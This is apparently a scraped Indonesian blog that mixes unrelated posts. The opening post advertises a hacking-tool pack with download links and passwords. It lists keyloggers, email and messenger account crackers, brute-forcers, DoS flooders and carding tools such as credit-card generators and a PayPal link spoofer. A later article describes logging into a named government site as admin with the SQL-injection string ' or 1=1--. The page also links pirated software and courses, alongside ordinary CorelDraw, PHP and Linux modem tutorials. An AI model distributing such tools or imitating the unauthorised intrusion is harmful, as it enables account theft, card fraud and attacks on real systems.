- Binder & Packer (15 Tools)
- Flood_DOS (20 Tools)
- Messenger (11 Tools)
- Bruter (9 Tools)
- Anonimity (1 Tool)
- !!! $$$ !!! (13 Tools)
- AIO

Exploit Collection

1. 10377 Exploit
2. SMF ShoutBox Xss & HTML Injection
3. SMF Ultimate Shoutbox Cookie Disclosure Exploit
4. Firefox_BuG

Messenger

1. MSN Extreme 3.0
2. MSN Spy Lite v1.0
3. Yahoo Hack!
4. Hotmail Email Hacker
5. Hotmail Hacker Gold
6. HotmailHack
7. YahooUltraCracker
8. winks,moods,mugins,weemees and meegos + Installer
9. MSN Messenger Account Cracker v2.0
10. SH Yahoo Pass Sender 1.1
11. Yahoo Password Decoder

Google Hacking

1. Alt GooGle
2. Google Version 1.2
3. Google H4ck3r (3 programs)
4. GooLink

Keyloggers

1. Elgolf 1.0 Beta
2. ESK KeyLogger
3. Glog Keylogger
4. HermanAgent
5. IKlogger0.1

Bbruter

1. WebCrack v4.0
2. Brutus
3. Crack FTP
4. FTP Brute Hacker
5. phpbb bruteforcer
6. PhpBB Pass Extractor
7. phpBB Cracker
8. Email Cracker
9. FTP Brute Forcer

!!! $$$ !!!

1. Cmaster
2. CC Verify
3. CWizard
4. THCC
5. Visa Card Generator 06
6. Carcabot_Mass_Email
7. CcHack
8. CC-Fake
9. cvv2c
10. DesertCVV2
11. id-fake
12. Paypal-Link-Spoofed
13. HoW to get Credit Cards Fresh and Fastest

AIO

1. Uploader for All
2. Cool Small Usefull Dp

Flood DOS

1. Flowbabeflow
2. FreeSiteKiller V 2.01
3. Webxgrab
4. Web Attacker ENG
5. TheRapist-Dos Attacker
6. HybridFlood2
7. Ati-russ 3.0
8. Http Bomber v1.001b
9. Sprut
10. DoS_5
11. etherflood
12. DoSAttacker
13. phpBB Dos
14. phpBB Attacker
15. Ping Attack
16. Site Nuke
17. Divine Intervention
18. UC Forum Spammer
19. Inferno Nuker
20. Multiple Site Flood

Silahkan di download di :

http://rapidshare.com/files/24341192/XxxPass-C_H_Ver1.0-_2007-part1.rar.html
http://rapidshare.com/files/24350769/XxxPass-C_H_Ver1.0-_2007-part2.rar.html
Pass : XxxPass_DJ_haselking

Mirror di tempat lain ( Tambahan dari Mas Yudhie -- Terima kasih banyak Mas :D )
http://www.cocosunroofs.com/bbs/configs/free/inc0mp13te/XxxPass-C_H_Ver1.0-_2007-part1.rar
http://www.cocosunroofs.com/bbs/configs/free/inc0mp13te/XxxPass-C_H_Ver1.0-_2007-part2.rar
Pass : XxxPass_DJ_haselking

Hack ... hack ... hack the World !! :D

Hacking Video- Career Academy Hacking

............................ni Gambar'a......................................


Lagi-lagi video hacking bertebaran secara gratis. Yup, baru-baru ini ilmuwebsite staff menemukan harta karun luar biasa, video hacking academy, mulai dari Ethical Hacking, Penetration Testing, Footprinting, Reconnaissance, TCP IP Basics ,Scanning, Honeypots, Honeynets sampai dengan wireless hacking pun dibahas dalam video. Yang lebih menarik lagi, didalamnya di sediakan demo penetration testing lebih dari 300+ vulnerability. :D---- dan tentunya sebanding dengan kapasitasnya yang lebih dari 3 GB.

Silahkan bagi yang tertarik untuk mendownloadnya :

-Training Module 1 Ethical Hacking and Penetration Testing - cd 1 - 250 mb
http://rapidshare.com/files/6870957/traininga.part1.rar.html
http://rapidshare.com/files/6875509/traininga.part2.rar.html
http://rapidshare.com/files/6880184/traininga.part3.rar.html
http://rapidshare.com/files/6884786/traininga.part4.rar.html
http://rapidshare.com/files/6889797/traininga.part5.rar.html
http://rapidshare.com/files/6890170/traininga.part6.rar.html
------------------------------------------------------------
-Training Module 2 Footprinting and Reconnaissance - cd 2 - 210 mb

http://rapidshare.com/files/6920123/trainingb.part1.rar.html
http://rapidshare.com/files/6925380/trainingb.part2.rar.html
http://rapidshare.com/files/6930474/trainingb.part3.rar.html
http://rapidshare.com/files/6935598/trainingb.part4.rar.html
http://rapidshare.com/files/6937268/trainingb.part5.rar.html
------------------------------------------------------------
-Training Module 3 TCP IP Basics and Scanning - cd 3 - 153 mb

http://rapidshare.com/files/6950222/trainingc.part1.rar.html
http://rapidshare.com/files/6954540/trainingc.part2.rar.html
http://rapidshare.com/files/6958405/trainingc.part3.rar.html
http://rapidshare.com/files/6958651/trainingc.part4.rar.html
------------------------------------------------------------
-Training Module 4 Enumeration and Verification - cd 4 - 200 mb

http://rapidshare.com/files/6995889/trainingd.part1.rar.html
http://rapidshare.com/files/6999123/trainingd.part2.rar.html
http://rapidshare.com/files/7002551/trainingd.part3.rar.html
http://rapidshare.com/files/7005909/trainingd.part4.rar.html
http://rapidshare.com/files/7006074/trainingd.part5.rar.html
------------------------------------------------------------
-Training Module 5 Hacking Defending Wireless Modems - cd 5 - 94 mb

http://rapidshare.com/files/7017480/traininge.part1.rar.html
http://rapidshare.com/files/7021255/traininge.part2.rar.html
------------------------------------------------------------
-Training Module 6 Hacking Defending Web Servers - cd 6 - 150 mb

http://rapidshare.com/files/7029199/trainingf.part1.rar.html
http://rapidshare.com/files/7034545/trainingf.part2.rar.html
http://rapidshare.com/files/7039580/trainingf.part3.rar.html
http://rapidshare.com/files/7040200/trainingf.part4.rar.html
------------------------------------------------------------
-Training Module 7 Hacking Defending Web Applications - cd 7 - 110 mb

http://rapidshare.com/files/7049302/trainingg.part1.rar.html
http://rapidshare.com/files/7054559/trainingg.part2.rar.html
http://rapidshare.com/files/7056051/trainingg.part3.rar.html
------------------------------------------------------------
-Training Module 8 Sniffers and Session Hijacking - cd 8 - 115 mb

http://rapidshare.com/files/7069844/trainingh.part1.rar.html
http://rapidshare.com/files/7076146/trainingh.part2.rar.html
http://rapidshare.com/files/7084439/trainingh.part3.rar.html
------------------------------------------------------------
-Training Module 9 Hacking Defending Windows Systems - cd 9 - 120 mb

http://rapidshare.com/files/7090868/trainingi.part1.rar.html
http://rapidshare.com/files/7095821/trainingi.part2.rar.html
http://rapidshare.com/files/7097885/trainingi.part3.rar.html
------------------------------------------------------------
-Training Module 10 Hacking Defending Unix Systems - cd 10 - 150 mb

http://rapidshare.com/files/7136591/trainingJ.part1.rar.html
http://rapidshare.com/files/7139658/trainingJ.part2.rar.html
http://rapidshare.com/files/7142501/trainingJ.part3.rar.html
------------------------------------------------------------
-Training Module 11 Rootkits Backdoors Trojans Tunnels - cd 11 - 115 mb

http://rapidshare.com/files/7147118/trainingk.part1.rar.html
http://rapidshare.com/files/7159091/trainingk.part2.rar.html
http://rapidshare.com/files/7160611/trainingk.part3.rar.html
------------------------------------------------------------
-Training Module 12 Denial of Service and Botnets - cd 12 - 100 mb

http://rapidshare.com/files/7182977/trainingL.part1.rar.html
http://rapidshare.com/files/7187533/trainingL.part2.rar.html
------------------------------------------------------------
-Training Module 13 Automated Pen Testing Tools - cd 13 - 102 mb

http://rapidshare.com/files/7202752/trainingm.part1.rar.html
http://rapidshare.com/files/7208149/trainingm.part2.rar.html
http://rapidshare.com/files/7208549/trainingm.part3.rar.html
------------------------------------------------------------
-Training Module 14 Intrusion Detection Systems - cd 14 - 140 mb

http://rapidshare.com/files/7224433/trainingn.part1.rar.html
http://rapidshare.com/files/7230417/trainingn.part2.rar.html
http://rapidshare.com/files/7234950/trainingn.part3.rar.html
------------------------------------------------------------
-Training Module 15 Firewalls - cd 15 - 160 mb

http://rapidshare.com/files/7252545/trainingo.part1.rar.html
http://rapidshare.com/files/7255895/trainingo.part2.rar.html
http://rapidshare.com/files/7258850/trainingo.part3.rar.html
http://rapidshare.com/files/7259491/trainingo.part4.rar.html
------------------------------------------------------------
-Training Module 16 Honeypots and Honeynets - cd 16 - 120 mb

http://rapidshare.com/files/7262593/trainingp.part1.rar.html
http://rapidshare.com/files/7265259/trainingp.part2.rar.html
http://rapidshare.com/files/7266075/trainingp.part3.rar.html
------------------------------------------------------------
-Training Module 17 Ethics and Legal Issues - cd 17 - 90 mb

http://rapidshare.com/files/7268140/trainingq.part1.rar.html
http://rapidshare.com/files/7269823/trainingq.part2.rar.html
------------------------------------------------------------

Password = jL4XyiI7MxX3afM0

Cek Bug PHP Script

Setelah terampungkan script php yang telah kita buat ada kalanya bug-bug yang tidak diinginkan bercokol di sela-sela script yang telah siap dionlinekan. Dan tentunya bug ini bisa berakibat fatal sehingga dapat dimanfaatkan oleh para intruder-intruder yang berusaha untuk mengekploitasi system.

Dan siapa sangka script php yang telah dibuat itu aman dari kerentanan dalam masalah security. :D~~~

Lalu, bagaimana mencegah sang hacker mengekploitasi, bahkan merusak website anda, bagaimana mencegah secara pasti dan mengetahui script yang telah dibuat memiliki bug yang fatal, bagaimana menangani itu semua ?? :D

Sebelum kita beralih maju ke langkah selanjutnya ada baiknya untuk mengenali bug popular yang paling sering diexploitasi.

Penulis akan mencoba untuk memberikan sedikit penjelasan, bug yang sering dijumpai dalam aplikasi berbasis web khususnya Content Management system maupun yang lainnya. Di antaranya :

- XSS ( Cross Site Scripting )
- SQL Injection
- RFI ( Remote File Inclusion )

Cross Site Scriping
Lebih dikenal dengan sebutan XSS. Kesalahan ini terjadi karena tidak adanya filtering pada html maupun java script.

Tetapi pada dasarnya defacing ( perubahan kontent ) hanya terjadi disisi client saja. Yang paling fatal dari bug ini adalah anda dapat mencuri cookie kemudian menggunakannya untuk berbuat sesuatu yang ... :D~~

Contohnya :
Sensored [ maaf ]

SQL Injection
SQL Injection sebenarnya terjadi karena seorang attacker yang mencoba melakukan inject query sql melalui form ataupun via address bar pada browser internet. Sebagai contohnya ketika penulis mencoba login sebagai admin pada situs pemerintah Sumatra Selatan ( http://www.sumsel.go.id ). Dengan menggunakan query ' or 1=1-- penulis pun berhasil login. Pada dasarnya ' atau single quote dan or 1=1-- itu berfungsi untuk membingungkan si server sql, sehingga yang dilakukan oleh server sql adalah menjalankan query " select * ". Yang terjadi adalah penulis diloloskan untuk login sebagai admin.

Berikut adalah gambar yang penulis capture ketika penulis berhasil login sebagai admin pada situs http://www.sumsel.go.id

tutorial jaringan komputer


tutorial jaringan komputer

Gambar ini diambil sebelum penulis mengontak webmaster via email untuk mempatch script phpnya.

RFI ( Remote File Inclusion )
Sebelumnya silahkan membaca artikel fungsi require, require_once, include, dan include_one RFI sendiri terjadi karena kesalahan programmer ketika melakukan coding, yakni menggunakan variable dalam fungsi-fungsi tersebut. Apabila user memasukkan url evil script miliknya pada variable yang digunakan dalam fungsi require ataupun include, yang terjadi adalah evil script tersebut dapat dieksekusi secara remote, dengan kata lain, attacker dapat menjalan command di server milik anda untuk merubah konten situs atau bahkan merusaknya. :D~~

Untuk contohnya silahkan anda cari di www.milw0rm.com :D~

Keywordnya Remote File Inclusion. :D~

Pengecekan BUG
Pengecekan bug sendiri bisa dilakukan secara manual. Hmmm ... tentunya ini akan memakan banyak waktu. Terbentuklah tools yang dapat secara cepat dan otomatis menemukan bug-bug yang terselip di php script secara tidak sengaja maupun sengaja. :D~

Pada dasarnya untuk mengecek bug dapat dilakukan secara online maupun offline. Penulis sarankan pengecekan bug ini dilakukan di localhost anda ( offline ) saja.

Cek Bug XSS
Tools untuk mengecek XSS pada script php milik anda adalah sebuah addons mozilla firefox yang disediakan secara gratis. Penginstallannya pun tergolong mudah, berikut juga cara penggunaannya.

Tools tersebut dapat anda download disini :

http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi

Cek Bug SQL Injection
Untuk periode saat ini defacing dengan SQL Injection digolongkan paling favorit dan tentunya paling banyak digunakan, mungkin karena penyerangan yang dilakukan cukup mudah, cukup memiliki dasar pengetahuan syntax sql. Lagi-lagi sebuah addons mozilla firefox yang cukup ampuh dan mudah digunakan telah disediakan untuk melakukan cek bug sql injection. :D

Anda dapat mendownloadnya disini :
http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi

Penggunaanya pun tidak terlalu sulit.

Cek BUG Remote File Inclusion
Sebelumya anda download terlebih dahulu scriptnya disini http://www.newhack.org/dl_jump.php?id
Setelah itu silahkan download active perl, compiler interpreter ini nantinya digunakan untuk menjalankan script inclusionscanner.pl.
Dan kemudian copykan inclusionscanner.pl tersebut ke direktori c:\perl\bin

Langkah selanjutnya :

1. Masukkan script yang akan anda scan kedalam sebuah direktori di c:\perl php.

ex : c:\perl\wordpress.

2. Masuk ke command prompt, start | run | cmd | enter

3. Setelah itu masuk ke direktory c:\perl\bin, cd c:\perl\bin

4. Jalankan scriptnya,

C:\Perl\bin>perl.exe inclusionscanner.pl

#Will check a directory for all includes and unsets

#Coded by Ironfist (ironsecurity.nl)

#Usage: create a folder in your perlfolder and put the files to be scanned in it

, next type the folder name below (eg myfolder)

#GIVES ERRORS WHEN CHECKING SUBFOLDERS: IGNORE THEM :)

Directory to read? c:\perl\wp

kemudian lihat hasilnya di c:\perl\bin\result.html

berikut hasil scan ketika penulis mencoba untuk melakukan cek inclusion pada wordpress-2.3.3 :

FOUND: require_once($locale_file);
in c:\perl\wp/wp-settings.php FOUND: require_once($import_root . '/' . $file);
in c:\perl\wp/wp-admin/import.php FOUND: include_once($this->PluginDir . "class-smtp.php");
in c:\perl\wp/wp-includes/class-phpmailer.php FOUND: include($lang_path.'phpmailer.lang-'.$lang_type.'.php');
in c:\perl\wp/wp-includes/class-phpmailer.php FOUND: include($lang_path.'phpmailer.lang-en.php');
in c:\perl\wp/wp-includes/class-phpmailer.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: require_once($_template_file);
in c:\perl\wp/wp-includes/theme.php


woww !!! :D~~ silahkan di exploitasi eh di patch script milik anda. :D~~

cOreL dRaw portAbLe

CorelDraw, aplikasi yang wajib dimiliki oleh seorang designer grafis.
Manakala dibutuhkan, software tersebut harus senantiasa diharapkan
untuk hadir, memuntahkan semua kreatifitas, imajinasi, mewakili daya
khayal. Bagi pengguna yang belum memiliki notebook sendiri, mungkin itu
adalah sesuatu yang sulit untuk dipenuhi. Stress sendiri, akibat dari
harus selalu nginstall pada setiap komputer yang akan diduduki.
Sekarang
jamannya aplikasi portable, dikemas khusus untuk bekerja pada usb
flashdisk, tanpa proses installasi. Begitu juga dengan coreldraw11.
Nggak usah basa-basi lagi, langsung aja download softwarenya.

CorelDraw 11 Portable
passwordnya : taz
http://rapidshare.com/files/2072284/PortC11.rar
selamat mencoba ...
Sumber dari situs Ilmu Website dalam kategori coreldraw dengan judul CorelDraw 11 Portable Githu Loh ...

Membuat Bercak Noda dengan SmudgeBrush


Dalam Tutorial Kali ini saya mencoba menjelaskan kepada anda bagaimana cara membuat suatu bercak noda, baik itu noda tinta, darah, noda bersejarah, kendaraan bernoda empat, halah! :D walaupun sebetulnya internet menyediakan secara gratis font symbol bercak-bercak tersebut, seperti WC Rhesus A, WC Rhesus B, etc.

Silahkan anda mengawalinya dengan membuat new file, kemudian buatlah sebuah lingkaran ( F7 ), untuk membuat suatu lingkaran anda cukup me-klik ctrl kemudian drag.
Untuk contoh, disini saya memakai diameter 831 pixel

setelah itu klik kanan object tersebut, pilih convert to curve, ini perlu dilakukan untuk mempermudah smudge brush nanti.

kemudian silahkan anda atur object lingkaran tersebut sedemikian rupa , sehingga terlihat seperti sebuah bercak yang jatuh dari atas
saya membuatnya seperti ini :

kemudian pilih smudge brush dan isi enter a fixed value for tilt setting dengan nilai 90






setelah itu anda bisa merubah bentuk object tersebut sedemikian rupa dengan shape tool





dan inilah hasil akhir dari penjelasan tutorial ini.

Anda dapat mendownload file mentahnya dalam format cdr di sini

http://unair.info/img/bercak/bercak.cdr

Ya, cukup sekian saja tutorial design grafis untuk kali ini. Kalo ada pertanyaan langsung aja ditanyakan. :D
Sumber dari situs Ilmu Website dalam kategori coreldraw dengan judul Membuat Bercak Noda dengan SmudgeBrush

Tutorial yang akan saya bawakan kali ini adalah, membuat butiran air dengan aplikasi  CorelDraw, saya sengaja menggunakan Coreldraw. Alasannya adalah vector, yang tidak  mengalami distorsi walaupun gambar diperbesar beberapa kali.

Langsung saja :

Pada awalnya kita membutuhkan sebuah rectangle yang nantinya digunakan sebagai alas.
Tekan F6 di keyboard untuk langsung membuatnya. Di sini saya membuatnya dengan  ukuran 368 x 234 pixel.

Kemudian saya menggunakan elispe tool dengan menekan F7 di keyboard untuk membuat
sebuah elips dengan ukuran 43 x 51 px.


1. Melakukan duplikasi elips tersebut dengan mengopynya ctrl+c lalu mem-pastenya ctrl+v  di tempat yang sama.

2. Setelah itu, di luar persegi, buatlah sebuah rectangle ( ukuran bebas ). Kemudian, rectangle yang telah dibuat tadi di taruh di atas elips hasil kopian yang tadi.

3. Dalam keadaan keduanya terpilih. Lakukan trim ( back minus front ).
    Sehingga hasilnya seperti ini, setelah fillnya di beri warna putih.


4. Dengan transparency tool, lakukan transparasi gradien, menjadi seperti ini. kemudian lakukan langkah no 1 sebanyak 2 kali. hal ini di gunakan untuk memberi sisi gelap dari butiran air.

5. Perbesarlah salah satu elips yang tadi ... kemudian lakukan trim, seperti di langkah ke 3.



6. Kemudian dengan transparency tool, lakukan transparansi gradien seperti ini ...


7. Setelah itu, hilangkan outline-nya dengan memilih objek yang akan dihilangkan outline, kemudian klik ikon seperti gambar di bawah ini :


8. Kemudian, buatlah elipse dengan ukuran 6 x 6 pixel. Beri fill colornya warna putih. Setelah itu berilah shadow effect, dengan memilih interactive drop shadow tool, shadow ini akan di gunakan sebagai pantulan cahaya putih nantinya.


9. Beri drop shadow colornya berwarna putih,  kemudian drop shadow opacitynya 86 persen.

10. Kemudian buatlah kembali elips dengan ukuran 43 x 51 pixel. Beri fillcolornya berwarna putih.
11. Setelah itu, buat kembali elips dengan ukuran 50 x 51 pixel. Elips ke dua ini di taruh di bawah elips sebelumnya.

12. Lakukan trim ( back minus front ) pada kedua elips tersebut sehingga menjadi seperti ini. Kemudian berilah transparasi sebesar 68 persen.


Yup, hasil akhirnya akan seperti ini.


File tutorial ini dapat di download di sini.
http://unair.info/img/embun/embun.cdr

Sumber dari situs Ilmu Website dalam kategori coreldraw dengan judul Membuat Butiran Air

Minggu, 27 Juli 2008

belajar php ama oop


Pada awal PHP diciptakan oleh Rasmus Lerdorf, PHP hanya mendukung konsep
pemrograman prosedural. Hingga PHP versi 4 pun masih berkonsep prosedural.
Akhirnya diciptakanlah PHP versi 5 yang telah mendukung konsep orientasi objek
(OOP).
Lantas apa kelebihan konsep orientasi objek dibandingkan prosedural ?
Banyak sekali keuntungannya. :) Konsep orientasi objek mendukung
pewarisan,selain itu konsep OOP berkemampuan untuk menggunakan nama variabel
yang sama secara berulang-ulang. Itu sebabnya konsep OOP sangat bagus digunakan
untuk proyek pembangunan web yang besar.


Baiklah saya akan memperlihatkan contoh sederhana OOP pada PHP.


<?php
class cetak {
   function hallo ()
{
   print "Hallo.. !!!";
   }
}
$cetak = new
cetak();
$cetak->hallo ();
?>


Hasilnya : Hallo.. !!!


Berbeda dengan konsep prosedural, pada awal pembuatan program memang akan
terasa sulit. Tetapi bila anda membangun proyek yang besar, sebaiknya
menggunakan konsep OOP karena jika listing program yang anda tuliskan sudah
banyak, anda akan kebingungan dengan penamaan variabel.Dalam lingkungan PHP,
kalangan orientasi objek lebih cenderung membuat modul PEAR dan memiliki
kontribusi besar terhadap kemudahan pengelolaan kode program.


Sekian dulu penjelasan dari saya. Nantikan artikel berlanjut Konsep OOP pada
PHP ini. Jika ada yang ingin ditanyakan silahkan hubungi saya di :


Email 1 : ivan@ilmuwebsite.com
Email 2 : ivan_wen_piao@yahoo.co.id
Web
: http://ivan.ilmuwebsite.com



Sumber dari situs Ilmu Website dalam kategori php kuliah dengan judul PHP dan Class Part1

jaDul tapi masa Depan bRo....



Keberadaan internet sudah menjadi makanan pokok bagi keseharian orang-orang. Bahkan seorang teman penulis pernah mengatakan, sehari tidak berinternet membuat hidup terasa hampa. :D~~. Dan sedikit banyak orang  kecanduan dalam memperoleh informasi melalui internet karena selain informasi yang disajikan selain cukup aktual, namun juga secara cepat informasi didapatkan dalam hitungan menit. Bagi si pemberi informasi tidak perlu lagi harus ke tempat percetakan untuk sekedar memberi tahu kepada khalayah bahwa terdapat informasi baru yang menarik. Yups, seperti intro-nya harus di bedakan menjadi artikel tersendiri. :D~~ Bisa bisa penulis keasikan membuat intro sampai tutorial ini habis. :D~ Seperti biasa, untuk tutorial linux kali ini penulis akan mencoba menjelaskan tidak secara terperinci namun mudah-mudahan jelas.
HP yang penulis gunakan adalah Samsung ZTE C300 yang telah dipaketkan dengan Fren ( waktu penulis beli seharga 388 ribu ). Relatif murah namun dapat diandalkan. Perlu diketahui penulis telah melakukan test di lingkungan UBUNTU 8.04 ( hardy heron ). Ubuntu sendiri bisa anda dapatkan di http://shipit.ubuntu.org . Dan satu lagi yang dibutuhkan yaitu kabel usb yang biasa digunakan untuk kamera digital ataupun card reader.
Langsung saja pasang kabel usbnya.

Penginstallan modul driver hp zte c300 dilakukan dalam mode root.
( perhatian : perintah yang diketikkan hanya yang di beri cetak tebal /bold )

Untuk mendeteksi apakah usb dan handphone telah terpasang dengan benar
root@alk-linux:/home/alk# lsusb

tampilan di layar anda mungkin sedikit berbeda ....

Bus 005 Device 003: ID 064e:a100 Suyin Corp.
Bus 005 Device 001: ID 0000:0000 
Bus 004 Device 001: ID 0000:0000 
Bus 003 Device 001: ID 0000:0000 
Bus 002 Device 006: ID 05c6:3197 Qualcomm, Inc. CDMA Wireless Modem/Phone
Bus 002 Device 003: ID 15ca:00c3 
Bus 002 Device 001: ID 0000:0000 
Bus 001 Device 001: ID 0000:0000 

disini terlihat jelas hp cdma zte c300 dideteksi sebagai Wireless Modem.
Setelah terdeteksi langsung saja install modul yang cocok untuk driver modem hp diatas.

root@alk-linux:/home/alk# sudo modprobe usbserial vendor=0x05c6 product=0x3197

kemudian cek, apakah sudah terdeteksi dengan baik ...
root@alk-linux:/home/alk#  dmesg

kira-kira tampilannya seperti ini
[ 2912.143117] usbcore: registered new interface driver usbserial
[ 2912.143842] /build/buildd/linux-2.6.24/drivers/usb/serial/usb-serial.c: USB Serial support registered for generic
[ 2912.144546] usbserial_generic 2-1:1.0: generic converter detected
[ 2912.145274] usb 2-1: generic converter now attached to ttyUSB0
[ 2912.145663] usbserial_generic 2-1:1.1: generic converter detected
[ 2912.146305] usb 2-1: generic converter now attached to ttyUSB1
[ 2912.146685] usbcore: registered new interface driver usbserial_generic
[ 2912.146689] /build/buildd/linux-2.6.24/drivers/usb/serial/usb-serial.c: USB Serial Driver core

Selanjutnya kita akan melakukan koneksi dengan menggunakan wvdial, secara default wvdial di ubuntuk 8.04 sudah terinstall dengan baik, namun jika belum terinstall ...
root@alk-linux:/home/alk# apt-get install wvdial

setelah selesai, langsung kita edit konfigurasi si wvdial untuk dapat melakukan koneksi internet.
root@alk-linux:/home/alk# gedit /etc/wvdial.conf &

tanda & itu hanyalah sebagai operand untuk menjalankan command yang ada tersebut secara background.

Yang perlu ditambahkan kedalam /etc/wvdial.conf adalah sebagai berikut :

[Dialer Defaults]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Baud = 460800
Modem Type = USB Modem
New PPPD = yes
Modem=/dev/ttyUSB0
ISDN=0
Phone=#777
Username = m8
Password = m8
Stupid Mode = yes

Setelah di save, langsung di coba ...

root@alk-linux:/home/alk# wvdial

--> WvDial: Internet dialer version 1.60
--> Cannot get information for serial port.
--> Initializing modem.
--> Sending: ATZ
ATZ
OK
--> Sending: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
OK
--> Modem initialized.
--> Sending: ATDT#777
--> Waiting for carrier.
ATDT#777
CONNECT
--> Carrier detected.  Starting PPP immediately.
--> Starting pppd at Thu Jun 12 13:04:41 2008
--> Pid of pppd: 6992
--> Using interface ppp0
--> pppd: ��[06][08]H�[06][08]
--> pppd: ��[06][08]H�[06][08]
--> pppd: ��[06][08]H�[06][08]
--> pppd: ��[06][08]H�[06][08]
--> local  IP address 10.66.30.173
--> pppd: ��[06][08]H�[06][08]
--> remote IP address 192.168.240.83
--> pppd: ��[06][08]H�[06][08]
--> primary   DNS address 202.171.1.18
--> pppd: ��[06][08]H�[06][08]
--> secondary DNS address 202.171.1.2
--> pppd: ��[06][08]H�[06][08]


jika terdapat tampilan seperti ini maka anda sudah dapat berinternet ria .. :D~~

root@alk-linux:/home/alk# ifconfig
...
...
ppp0      Link encap:Point-to-Point Protocol 
          inet addr:10.66.30.173  P-t-P:192.168.240.83  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1500  Metric:1
          RX packets:4 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:3
          RX bytes:64 (64.0 B)  TX bytes:97 (97.0 B)



Selamat mencoba.

Greetz : b_scorpio, phii_, safril, fadli, minangmedia, dr.emi, ilmuwebsite community. :D
Hi My Jojo :-). Have a nice day.


Sumber dari situs Ilmu Website dalam kategori linux dengan judul Ber-internet-an dengan HP CDMA ZTE C300

mo bikin animasi dLu ah...



Jumpa kembali dengan penulis, seperti janji  penulis sebelumnya,
penulis akan membayar lunas sekarang. :D~ Dalam tutorial Coreldraw kali
ini penulis akan coba jelaskan pemanfaatan teknik pewarnaan dan shaping
yang sederhana untuk memberikan kesan kedalaman dan gelap terang. Perlu
dicatat, tools coreldraw yang akan kita gunakan nanti adalah, Shape Tool, Pen Tool, Erase Tool, Transparency Tool dan Rectangle Tool.



Yups, sebelum masuk kedalam tutorial intinya yaitu Teknik Shaping
Lipatan Kertas, penulis akan sedikit membicarakan tentang teknik
pewarnaan terlebih dahulu. Khususnya teknik pewarnaan gelap terang.
Coreldraw bukanlah suatu aplikasi 3D yang dapat menghasilkan bidang
gelap dan terang secara otomatis, dengan kata lain CorelDraw tidak
dapat berfungsi sebagaimana yang dapat dilakukan oleh aplikasi 3DS Max,
Alias Maya Wavefront ataupun aplikasi 3D papan atas lainnya. Namun
dalam coreldraw seorang graphic designer benar-benar dituntut untuk
sekreatif mungkin menghasilkan kesan kedalaman dari suatu objek yang
dibuat agar terlihat benar-benar alami. Ini tantangan yang sulit
memang, tapi cukup menyenangkan. Disinilah toolbar serba guna milik
coreldraw benar-benar berperan penting sebagai peralatan perang bagi
para designer yang menggunakannya. Huff… Untuk teknik gambar
bentuk/shaping penulis tidak akan jelaskan secara terperinci karena ini
merupakan teknik shaping sederhana yang benar-benar biasa. :D



Sebelum bertempur, biasakanlah untuk membuat lembar baru.

Kemudian klik lembar baru kosong tersebut, pada bagian unit pilih pixels.

Ya, langsung saja kita ujicobakan tutorial coreldrawnya :



Pertama pilih tool rectangle, atau dapat juga menekan F6 di keyboard.





Buat bentuk persegi dengan width 990 px dan heightnya 1319 px





Dengan Erase tools …





Hapus/hilangkan sedikit demi sedikit bagian pinggir-pinggirnya dari
objek persegi yang baru di buat tadi sehingga hasilnya seperti ini …





Dengan shape tools …





Lekuk-lekukan bagian ujung atas dan pinggir-pinggir objek persegi tersebut …





sehingga hasil akhirnya nanti akan seperti ini …





Buatlah sebuah shape dengan pen tool ukurannya width 539 px  dan height 274 px





Sehingga hasilnya yaitu segitiga seperti ini …





Pilih bagian alas segitiga tersebut kemudian klik kanan pilih to curve





Lekuk-lekukan bagian alas tersebut hingga hasil akhirnya menjadi seperti ini …





Jika di gabung dengan objek persegi yang tadi akan menjadi seperti ini







Sekarang masuk kebagian teknik Pewarnaan I.

Teknik pewarnaan yang pertama ini butuhkan karena nanti objek-objek
tersebut akan tumpang tindih sehingga sulit untuk di berikan pewarnaan.




Buatlah duplikat segitiga yang tadi, dengan cara copy paste, kemudian beri warna 90% black seperti ini.





Kemudian pilih menu bitmap, lalu convert to bitmap, setelah selesai
dalam kondisi objek yang diconvert tersebut terpilih/terseleksi masuk
ke menu bitmaps | blur | gausian blur, berikan radiusnya 10.0 …





Hingga hasilnya menjadi seperti ini …





Kemudian dengan transparency tool,





Buat menjadi transparan di bagian alas segitiga yang telah diblur tersebut,





Kemudian letakkan tepat di bawah segitiga yang sebelumnya, hingga menjadi seperti ini





Dengan Interactive Fill Tool





Lakukan pewarnaan objek persegi sehingga menjadi seperti ini …





Masih dengan interactive fill tool, lakukan pewarnaan pada objek segitiga tadi sehingga hasilnya menjadi seperti ini …





Kemudian dengan pen tool





Buat satu objek baru, di atas objek segitiga, seperti ini …





Seleksi segitiga yang baru tersebut, kemudian tekan shift di keyboard
kemudian klik objek segitiga yang telah diberiwarna dibawahnya, pilih
menu Arrange | Shaping | Intersect, kira-kira seperti ini hasilnya …





Delete objek segitiga yang paling atas, dan beri warna hitam objek yang dihasilkan dari intersect tadi …





Dengan transparency tool …





Lakukan transparansi di bagian sisi objek hasil intersect tersebut sehingga hasilnya seperti ini ….





Selanjutnya kita akan memberikan efek gelap pada objek persegi paling besar.

Buat objek baru diatas objek persegi yang utama …





Kemudian pilih objek yang baru, kemudian klik shift di keyboard,
seleksi objek persegi yang besar di bawahnya, pilih menu Arrange |
Shaping | Intersect, sehingga hasilnya seperti ini





Hapus persegi yang paling atas, kemudian beri warna 70% black.

